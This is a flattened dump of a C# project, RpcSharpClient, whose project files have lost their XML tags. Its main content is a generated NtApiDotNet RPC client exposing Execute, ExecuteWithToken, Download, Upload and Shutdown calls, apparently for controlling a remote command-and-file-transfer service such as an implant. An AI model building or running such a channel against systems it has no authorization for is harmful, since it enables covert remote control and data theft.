Guid("0abb9f2a-6913-4174-9431-851f9d3e94b4")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /RpcSharpClient/RpcSharpClient.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | Debug 8 | AnyCPU 9 | {0ABB9F2A-6913-4174-9431-851F9D3E94B4} 10 | Exe 11 | RpcSharpClient 12 | RpcSharpClient 13 | v4.7.2 14 | 512 15 | true 16 | true 17 | publish\ 18 | true 19 | Disk 20 | false 21 | Foreground 22 | 7 23 | Days 24 | false 25 | false 26 | true 27 | 0 28 | 1.0.0.%2a 29 | false 30 | false 31 | true 32 | 33 | 34 | 35 | 36 | AnyCPU 37 | true 38 | full 39 | false 40 | ..\ 41 | DEBUG;TRACE 42 | prompt 43 | 4 44 | 45 | 46 | 47 | 48 | AnyCPU 49 | pdbonly 50 | false 51 | ..\ 52 | TRACE 53 | prompt 54 | 4 55 | 56 | 57 | 58 | 59 | 60 | ..\packages\NtApiDotNet.1.1.33\lib\net461\NtApiDotNet.dll 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | False 86 | Microsoft .NET Framework 4.7.2 %28x86 and x64%29 87 | true 88 | 89 | 90 | False 91 | .NET Framework 3.5 SP1 92 | false 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}. 102 | 103 | 104 | 105 | 106 | 107 | 108 | -------------------------------------------------------------------------------- /RpcSharpClient/RpcSharpClient.csproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | publish\ 5 | 6 | 7 | 8 | 9 | 10 | en-US 11 | false 12 | 13 | -------------------------------------------------------------------------------- /RpcSharpClient/fa161e81-6e93-4f41-961c-ee9c2e75de17_1.0.cs: -------------------------------------------------------------------------------- 1 | namespace rpc_fa161e81_6e93_4f41_961c_ee9c2e75de17_1_0 2 | { 3 | 4 | #region Marshal Helpers 5 | internal class _Marshal_Helper : NtApiDotNet.Ndr.Marshal.NdrMarshalBuffer 6 | { 7 | } 8 | internal class _Unmarshal_Helper : NtApiDotNet.Ndr.Marshal.NdrUnmarshalBuffer 9 | { 10 | public _Unmarshal_Helper(NtApiDotNet.Win32.Rpc.RpcClientResponse r) : 11 | base(r.NdrBuffer, r.Handles, r.DataRepresentation) 12 | { 13 | } 14 | public _Unmarshal_Helper(byte[] ba) : 15 | base(ba) 16 | { 17 | } 18 | } 19 | #endregion 20 | #region Client Implementation 21 | public sealed class Client : NtApiDotNet.Win32.Rpc.RpcClientBase 22 | { 23 | public Client() : 24 | base("fa161e81-6e93-4f41-961c-ee9c2e75de17", 1, 0) 25 | { 26 | } 27 | private _Unmarshal_Helper SendReceive(int p, _Marshal_Helper m) 28 | { 29 | return new _Unmarshal_Helper(SendReceive(p, m.DataRepresentation, m.ToArray(), m.Handles)); 30 | } 31 | public void Execute(string p0, out string p1) 32 | { 33 | _Marshal_Helper m = new _Marshal_Helper(); 34 | m.WriteReferent(p0, new System.Action(m.WriteTerminatedAnsiString)); 35 | _Unmarshal_Helper u = SendReceive(0, m); 36 | p1 = u.ReadReferent(new System.Func(u.ReadConformantVaryingAnsiString), false); 37 | } 38 | public void ExecuteWithToken(string p0, int p1, out string p2) 39 | { 40 | _Marshal_Helper m = new _Marshal_Helper(); 41 | m.WriteReferent(p0, new System.Action(m.WriteTerminatedAnsiString)); 42 | m.WriteInt32(p1); 43 | _Unmarshal_Helper u = SendReceive(1, m); 44 | p2 = u.ReadReferent(new System.Func(u.ReadConformantVaryingAnsiString), false); 45 | } 46 | public void Download(string p0, out string p1) 47 | { 48 | _Marshal_Helper m = new _Marshal_Helper(); 49 | m.WriteReferent(p0, new System.Action(m.WriteTerminatedAnsiString)); 50 | _Unmarshal_Helper u = SendReceive(2, m); 51 | p1 = u.ReadReferent(new System.Func(u.ReadConformantVaryingAnsiString), false); 52 | } 53 | public void Upload(string p0, string p1) 54 | { 55 | _Marshal_Helper m = new _Marshal_Helper(); 56 | m.WriteReferent(p0, new System.Action(m.WriteTerminatedAnsiString)); 57 | m.WriteReferent(p1, new System.Action(m.WriteTerminatedAnsiString)); 58 | _Unmarshal_Helper u = SendReceive(3, m); 59 | } 60 | public void Shutdown() 61 | { 62 | _Marshal_Helper m = new _Marshal_Helper(); 63 | _Unmarshal_Helper u = SendReceive(4, m); 64 | } 65 | } 66 | #endregion 67 | } 68 | 69 | -------------------------------------------------------------------------------- /RpcSharpClient/packages.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | --------------------------------------------------------------------------------